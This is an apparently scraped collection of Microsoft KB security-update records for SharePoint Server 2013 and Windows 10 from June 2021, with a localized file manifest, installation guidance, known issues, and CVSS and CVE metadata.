\nrepres.dll_1057| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4463.1000| 12896| 12-May-21| 12:40 \nifsadminpages.resx.1040| ipfsadminpages.it-it.resx| | 31375| 12-May-21| 12:40 \nifsmain.css.1040| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1040| intlcorestrings.js| | 20019| 12-May-21| 12:40 \nipfscore.resx.1040| ipfscore.it-it.resx| | 11079| 12-May-21| 12:40 \nipfs.resx.1040| ipfs.it-it.resx| | 10850| 12-May-21| 12:40 \nifsintl.dll.1040| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 203384| 12-May-21| 12:40 \nrepres.dll_1040| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1041| ipfsadminpages.ja-jp.resx| | 34199| 12-May-21| 12:39 \nifsmain.css.1041| ifsmain.css| | 11638| 12-May-21| 12:39 
\nintlcorestrings.js.1041| intlcorestrings.js| | 23131| 12-May-21| 12:39 \nipfscore.resx.1041| ipfscore.ja-jp.resx| | 11661| 12-May-21| 12:39 \nipfs.resx.1041| ipfs.ja-jp.resx| | 11466| 12-May-21| 12:39 \nifsintl.dll.1041| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 233592| 12-May-21| 12:39 \nrepres.dll_1041| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1087| ipfsadminpages.kk-kz.resx| | 38393| 12-May-21| 12:40 \nifsmain.css.1087| ifsmain.css| | 9204| 12-May-21| 12:40 \nintlcorestrings.js.1087| intlcorestrings.js| | 26929| 12-May-21| 12:40 \nipfscore.resx.1087| ipfscore.kk-kz.resx| | 12573| 12-May-21| 12:40 \nipfs.resx.1087| ipfs.kk-kz.resx| | 12659| 12-May-21| 12:40 \nifsintl.dll.1087| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 265808| 12-May-21| 12:40 \nrepres.dll_1087| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4454.1000| 12864| 12-May-21| 12:40 \nifsadminpages.resx.1042| ipfsadminpages.ko-kr.resx| | 31506| 12-May-21| 12:40 \nifsmain.css.1042| ifsmain.css| | 9832| 12-May-21| 12:40 \nintlcorestrings.js.1042| intlcorestrings.js| | 20992| 12-May-21| 12:40 \nipfscore.resx.1042| ipfscore.ko-kr.resx| | 11036| 12-May-21| 12:40 \nipfs.resx.1042| ipfs.ko-kr.resx| | 10874| 12-May-21| 12:40 \nifsintl.dll.1042| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 211064| 12-May-21| 12:40 \nrepres.dll_1042| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1063| ipfsadminpages.lt-lt.resx| | 31596| 12-May-21| 12:40 \nifsmain.css.1063| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1063| intlcorestrings.js| | 20079| 12-May-21| 12:40 \nipfscore.resx.1063| ipfscore.lt-lt.resx| | 11077| 12-May-21| 12:40 \nipfs.resx.1063| ipfs.lt-lt.resx| | 10884| 12-May-21| 12:40 \nifsintl.dll.1063| 
microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 195168| 12-May-21| 12:40 \nrepres.dll_1063| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1062| ipfsadminpages.lv-lv.resx| | 31636| 12-May-21| 12:40 \nifsmain.css.1062| ifsmain.css| | 9147| 12-May-21| 12:40 \nintlcorestrings.js.1062| intlcorestrings.js| | 20252| 12-May-21| 12:40 \nipfscore.resx.1062| ipfscore.lv-lv.resx| | 11211| 12-May-21| 12:40 \nipfs.resx.1062| ipfs.lv-lv.resx| | 10981| 12-May-21| 12:40 \nifsintl.dll.1062| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 198288| 12-May-21| 12:40 \nrepres.dll_1062| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1071| ipfsadminpages.mk-mk.resx| | 39885| 12-May-21| 12:40 \nifsmain.css.1071| ifsmain.css| | 9158| 12-May-21| 12:40 \nintlcorestrings.js.1071| intlcorestrings.js| | 27605| 12-May-21| 12:40 \nipfscore.resx.1071| ipfscore.mk-mk.resx| | 12964| 12-May-21| 12:40 \nipfs.resx.1071| ipfs.mk-mk.resx| | 12891| 12-May-21| 12:40 \nifsintl.dll.1071| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 271024| 12-May-21| 12:40 \nrepres.dll_1071| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:40 \nifsadminpages.resx.1086| ipfsadminpages.ms-my.resx| | 30493| 12-May-21| 12:40 \nifsmain.css.1086| ifsmain.css| | 9216| 12-May-21| 12:40 \nintlcorestrings.js.1086| intlcorestrings.js| | 19705| 12-May-21| 12:40 \nipfscore.resx.1086| ipfscore.ms-my.resx| | 10762| 12-May-21| 12:40 \nipfs.resx.1086| ipfs.ms-my.resx| | 10725| 12-May-21| 12:40 \nifsintl.dll.1086| microsoft.office.infopath.server.intl.resources.dll| 15.0.4481.1000| 195152| 12-May-21| 12:40 \nrepres.dll_1086| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1044| 
ipfsadminpages.nb-no.resx| | 30116| 12-May-21| 12:40 \nifsmain.css.1044| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1044| intlcorestrings.js| | 19242| 12-May-21| 12:40 \nipfscore.resx.1044| ipfscore.nb-no.resx| | 10746| 12-May-21| 12:40 \nipfs.resx.1044| ipfs.nb-no.resx| | 10566| 12-May-21| 12:40 \nifsintl.dll.1044| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 191632| 12-May-21| 12:40 \nrepres.dll_1044| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1043| ipfsadminpages.nl-nl.resx| | 31781| 12-May-21| 12:40 \nifsmain.css.1043| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1043| intlcorestrings.js| | 21054| 12-May-21| 12:40 \nipfscore.resx.1043| ipfscore.nl-nl.resx| | 11138| 12-May-21| 12:40 \nipfs.resx.1043| ipfs.nl-nl.resx| | 11044| 12-May-21| 12:40 \nifsintl.dll.1043| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 207992| 12-May-21| 12:40 \nrepres.dll_1043| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1045| ipfsadminpages.pl-pl.resx| | 32265| 12-May-21| 12:40 \nifsmain.css.1045| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1045| intlcorestrings.js| | 20582| 12-May-21| 12:40 \nipfscore.resx.1045| ipfscore.pl-pl.resx| | 11335| 12-May-21| 12:40 \nipfs.resx.1045| ipfs.pl-pl.resx| | 11157| 12-May-21| 12:40 \nifsintl.dll.1045| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 209552| 12-May-21| 12:40 \nrepres.dll_1045| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12952| 12-May-21| 12:40 \nifsadminpages.resx.1164| ipfsadminpages.prs-af.resx| | 35762| 12-May-21| 12:40 \nifsmain.css.1164| ifsmain.css| | 9142| 12-May-21| 12:40 \nintlcorestrings.js.1164| intlcorestrings.js| | 25391| 12-May-21| 12:40 \nipfscore.resx.1164| ipfscore.prs-af.resx| | 11977| 12-May-21| 
12:40 \nipfs.resx.1164| ipfs.prs-af.resx| | 12211| 12-May-21| 12:40 \nifsintl.dll.1164| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 241840| 12-May-21| 12:40 \nrepres.dll_1164| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:40 \nifsadminpages.resx.1046| ipfsadminpages.pt-br.resx| | 32127| 12-May-21| 12:40 \nifsmain.css.1046| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1046| intlcorestrings.js| | 19944| 12-May-21| 12:40 \nipfscore.resx.1046| ipfscore.pt-br.resx| | 11246| 12-May-21| 12:40 \nipfs.resx.1046| ipfs.pt-br.resx| | 11015| 12-May-21| 12:40 \nifsintl.dll.1046| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 204920| 12-May-21| 12:40 \nrepres.dll_1046| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.2070| ipfsadminpages.pt-pt.resx| | 31960| 12-May-21| 12:40 \nifsmain.css.2070| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.2070| intlcorestrings.js| | 20362| 12-May-21| 12:40 \nipfscore.resx.2070| ipfscore.pt-pt.resx| | 11174| 12-May-21| 12:40 \nipfs.resx.2070| ipfs.pt-pt.resx| | 11040| 12-May-21| 12:40 \nifsintl.dll.2070| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 206456| 12-May-21| 12:40 \nrepres.dll_2070| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1048| ipfsadminpages.ro-ro.resx| | 31798| 12-May-21| 12:40 \nifsmain.css.1048| ifsmain.css| | 9220| 12-May-21| 12:40 \nintlcorestrings.js.1048| intlcorestrings.js| | 20321| 12-May-21| 12:40 \nipfscore.resx.1048| ipfscore.ro-ro.resx| | 11136| 12-May-21| 12:40 \nipfs.resx.1048| ipfs.ro-ro.resx| | 10967| 12-May-21| 12:40 \nifsintl.dll.1048| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 203360| 12-May-21| 12:40 \nrepres.dll_1048| 
microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1049| ipfsadminpages.ru-ru.resx| | 38683| 12-May-21| 12:40 \nifsmain.css.1049| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1049| intlcorestrings.js| | 27083| 12-May-21| 12:40 \nipfscore.resx.1049| ipfscore.ru-ru.resx| | 12767| 12-May-21| 12:40 \nipfs.resx.1049| ipfs.ru-ru.resx| | 12649| 12-May-21| 12:40 \nifsintl.dll.1049| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 271992| 12-May-21| 12:40 \nrepres.dll_1049| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1051| ipfsadminpages.sk-sk.resx| | 32188| 12-May-21| 12:40 \nifsmain.css.1051| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1051| intlcorestrings.js| | 20402| 12-May-21| 12:40 \nipfscore.resx.1051| ipfscore.sk-sk.resx| | 11309| 12-May-21| 12:40 \nipfs.resx.1051| ipfs.sk-sk.resx| | 11077| 12-May-21| 12:40 \nifsintl.dll.1051| microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 204384| 12-May-21| 12:40 \nrepres.dll_1051| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4460.1000| 12880| 12-May-21| 12:40 \nifsadminpages.resx.1060| ipfsadminpages.sl-si.resx| | 30992| 12-May-21| 12:40 \nifsmain.css.1060| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1060| intlcorestrings.js| | 19830| 12-May-21| 12:40 \nipfscore.resx.1060| ipfscore.sl-si.resx| | 11091| 12-May-21| 12:40 \nipfs.resx.1060| ipfs.sl-si.resx| | 10913| 12-May-21| 12:40 \nifsintl.dll.1060| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 196688| 12-May-21| 12:40 \nrepres.dll_1060| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.3098| ipfsadminpages.sr-cyrl-cs.resx| | 39383| 12-May-21| 12:40 \nifsmain.css.3098| ifsmain.css| | 9146| 12-May-21| 
\n \n## Information about protection and 
security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)\n\nLearn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## Change history\n\nThe following table summarizes some of the most important changes to this topic.\n\nDate| Description \n---|--- \nJune 29, 2021| Added a known issue in the \"Known issues in this update\" section. \nAugust 10, 2021| Updated the \"Known issues in this update\" section to provide a resolution to the issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: June 8, 2021 (KB4011698)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31963"], "modified": "2021-06-08T07:00:00", "id": "KB4011698", "href": "https://support.microsoft.com/en-us/help/4011698", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:32:09", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint Server 
remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) and [Microsoft Common Vulnerabilities and Exposures CVE-2021-31966](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966>).\n\n**Note:** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001954>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5001954 for the 64-bit version of SharePoint Enterprise Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=d3d98284-da2c-429b-9081-3dc8a0a1217c>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see Security update deployment information: June 8, 2021 (KB5004128).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4493170](<http://support.microsoft.com/kb/4493170>).\n\n### File hash information\n\nFile name| | SHA256 hash \n---|---|--- \ncoreserverloc2013-kb5001954-fullfile-x64-glb.exe| | 6F042F65B5C388D023E31890761827AB0FBBAB457B26AEAD342360C233CF64BC \n \n### File information\n\nDownload [the list of files that are included in security update 5001954](<https://download.microsoft.com/download/2/d/7/2d75ecc8-3b83-4e28-801b-1f7f296cfc2a/5001954.csv>).\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: June 8, 2021 (KB5001954)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "KB5001954", "href": "https://support.microsoft.com/en-us/help/5001954", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-13T10:52:38", "description": "None\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). 
To view other notes and messages, see the Windows 10, version 1909 update history home page.\n\n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18363.1116) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens devices that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue with an inconsistent shutdown during Windows Update that damages the Windows Management Instrumentation (WMI) repository. As a result, the Managed Object Format (MOF) Advance Installer fails.\n * Addresses an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device. You might also receive an 80080300 error or \"We ran into a problem. 
Reconnecting\u2026\" when attempting to authenticate or sign in to Teams.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystem.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). 
You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied \n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003698. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003710) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. 
This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003635>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003635](<https://download.microsoft.com/download/3/b/a/3babb75d-f970-4ed1-ba97-b69bc52e4049/5003635.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003635 (OS Build 18363.1621)\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-31958", "CVE-2021-33739"], "modified": "2021-06-08T07:00:00", "id": "KB5003635", "href": "https://support.microsoft.com/en-us/help/5003635", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:46:28", "description": "None\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). 
To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).\n\n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates to improve security when Windows performs basic operations.\n * Updates for storing and managing files.\n\n## Improvements and fixes\n\n### Windows 10 servicing stack update - 19041.1022, 19042.1022, and 19043.1022\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### Windows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1154) released June 8, 2021. 
Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens devices that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**\n\nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nA small subset of users have reported lower than expected performance in games after installing this update. 
Most users affected by this issue are running games full screen or borderless windowed modes and using two or more monitors.| This issue is resolved in KB5003690. \nAfter installing this update, 5.1 Dolby Digital audio may play containing a high-pitched noise or squeak in certain apps when using certain audio devices and Windows settings.**Note **This issue does not occur when stereo is used.| This issue is resolved in KB5003690. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. 
